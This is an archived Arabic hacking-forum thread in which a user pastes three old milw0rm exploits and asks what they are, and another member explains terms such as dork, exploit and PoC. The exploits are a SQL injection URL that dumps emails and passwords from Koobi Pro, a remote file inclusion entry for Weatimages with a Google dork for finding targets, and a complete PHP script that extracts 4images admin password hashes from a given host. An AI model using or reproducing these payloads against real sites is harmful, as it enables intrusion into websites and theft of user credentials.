:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   مساعدة من فظلكم في فهم شيء واحد بليييييييييييييز (http://www.vbspiders.com/vb/t29215.html)

ALG_vbspiders 05-11-2010 08:57 PM

مساعدة من فظلكم في فهم شيء واحد بليييييييييييييز
 
السلام عليكم

اخواني انا دخلت موقع الميل ورم ادور على الثغرات في هدا السكريبت images

لكن طلعت هده

سؤالي هل هي ثغرة في الاوبرا او ماذا :a23:

[PHP]#########################################
#
# Koobi Pro V6.25 showimages (galid)
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "index.php?area"galid
#
###########################################
EXPLOiT :

index.php?area=1&p=gallery&action=showimages&galid =-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user

###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################

# milw0rm.com [2008-04-08]/PHP]

المصدر

http://www.milw0rm.com/exploits/5414
ومادا تسمى هده ثغرة اومادا smilies2

[PHP]RFI Weatimages Hack
Script name : Weatimages
Script Download Adress:http://www.hotscripts.com/jump.php?listing_id=52592&jump_type=1
Demo site:http://www.nazarkin.name/projects/weatimages/demo/index.php?ini[langpack]=shelladress
Google Dork : inurl: index.php?ini[langpack]=

Author:Co-Sarper-Der
Contact:Sarperonline@gmail.com
Note:Thanx to ForeveRIslam

side note:

4. Installation

Unpack file "index.php" from this archive and upload it to separate directory (e.g. "photos/") on your web server.
In order to enable caching capabilities, you need to create the new directory named "weatimages-cache" in directory
with "index.php" and to set access rights 777 (rwxrwxrwx) to "weatimages-cache".
If you plan to customize configuration, upload "weatimages.ini" too.

If weatimages.ini was uploaded too then the product isn't vulnerable.

# milw0rm.com [2007-04-10]/PHP]


المصدر
http://www.milw0rm.com/exploits/3700


وهده اعتقد انها هي الثغرة صحيح:00001734[1]: sql

[PHP]#!/usr/bin/php
<?php
/*
4images 1.7.x Remote SQL Injection Vulnerability

Usage: php file.php [host] [path] [table prefix] [user id]

Googledork "powered by 4images 1.7.x"

Vulnerability: Disfigure
Research: h3llfyr3
Coding: Synsta.

PoC:
<target>/<4images_dir>/search.php?search_user=x%2527%20union%20select%20u ser_password%20from%204images_users%20where%20user _name=%2527ADMIN

[w4ck1ng] - w4ck1ng.com
*/
if(!$argv[3]){
die("Usage:
php $argv[0] [host] [path] [options] [table prefix] [user id]\n
Options:
-d: Determine table prefix\n
Example:
php $argv[0] domain.com /4images/ 4images_ 1
php $argv[0] domain.com /4images/ -d\n");
}
if(eregi("http://", $argv[1])){
die("Usage:
php $argv[0] [host] [path] [options] [table prefix] [user id]\n
Options:
-d: Determine table prefix\n
Example:
php $argv[0] domain.com /4images/ 4images_ 1
php $argv[0] domain.com /4images/ -d\n");
}
if($argv[3]=="-d"){
$pipe = fsockopen($argv[1],80);
if(!$pipe){
die("Cannot connect to host.");
} else {
$sql = "x%27";
$sql = urlencode($sql);
$req = "GET $argv[2]"."search.php?search_user="."$sql HTTP/1.1\r\n";
$req .= "Host: $argv[1]\r\n";
$req .= "Connection: Close\r\n\r\n";
fwrite($pipe , $req);
while(!feof($pipe)) {
$data .= fgets($pipe);
}
$gdata= explode("FROM ",$data);
$gtab = explode("WHERE ",$gdata[1]);
$tab = trim($gtab[0]);
$tab = str_replace("users","",$tab);
if(eregi("<br />", $page)){ die("Failed.."); }else{ die("Table Prefix: $tab\n"); }
}
}
if($argv[4]){
$pipe = fsockopen($argv[1],80);
if(!$pipe){
die("Cannot connect to host.");
} else {
$sql = "x%27%20union%20select%20user_password%20from%20". "$argv[3]"."users%20where%20user_id%3D%27$argv[4]";
$sql = urlencode($sql);
$req = "GET $argv[2]"."search.php?search_user="."$sql HTTP/1.1\r\n";
$req .= "Host: $argv[1]\r\n";
$req .= "Connection: Close\r\n\r\n";
fwrite($pipe , $req);
while(!feof($pipe)) {
$data .= fgets($pipe);
}
$gdata = explode("Unknown column '",$data);
$ghash = explode("' in 'where clause'",$gdata[1]);
$hash = $ghash[0];
if(strlen($hash) != 32){ die("Exploit failed..\n"); }else{ echo "Outputted Hash: $hash\n"; }
}
}
?>

# milw0rm.com [2006-10-08]/PHP]


المصدر

http://www.milw0rm.com/exploits/2487



اتمنى منكم افدتي ببعض المعلوما ارجوووووووووووووووووكم :a09::a09::a09::a09::a09:

ALG_vbspiders 05-12-2010 04:31 PM

لا احد يريد مساعدتيprayercry[1]:prayercry[1]:

Pick 06-18-2010 05:54 AM

السلام عليكم ورحمة الله
سؤاتك غير واضح يا اخي ... ؟؟؟ بدل السؤال اطلب ان تتعلم و ليس هذا القسم المخصص للتعلم :D
انت تبحث عن استفسارات عن اختراق المواقع لهذا انصحك بقسم دوره اختراق المواقع SQL 1nj3ct!on و دورة اكتشاف الثغرات و دوره احتراف استغلال ثغرات المواقع لكن ....
غموما هذه المواقع تعطيك الثغرات المكتشفة حديثا .. كمثال :
# Koobi Pro V6.25 showimages (galid) =السوفت المصاب بالثغرة المكتشفة و الدي يسثعمله الموقع ... في هده الحالة الموقع مصاب :D و ليسث OPRA هذا اكيد
على كل حال ما تحتاجه بسيط و هو تعلم بعض المصطلحات .. منها :
##AUTHOR الكاتب .. بالانجليزية
HOME منزل .. لكن هنا معناها الصفحة الرئيسية ( للكاتب) و هي على نفس الموقع = ليسث رئيسية
BLOG غني على التعريف و ال MAiL ايضا
DORK كلمات البحث للحصول على المواقع المصابة بالثغرة
EXPLOiT المقصود به هنا طريقة استغلال الثغرة
http://www.milw0rm.com/exploits/3700 <<< عموما لو كانت كما قلت(sql) لأسموها كذلك او ذكرو ذلك في ال Description
نعم :D ال POC هو المركز او المكان المحدد من الموقع الذي ستتم فيه العملية اي تطبق فيه الثغرة
اسف لانني لا استطيع التوضيح اكثر (التفسير الممل) لان سؤالك لم يكن واضح و لا دقيق لذا انصحك بزيارة الاقسام المذكورة في البداية


الساعة الآن 04:28 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0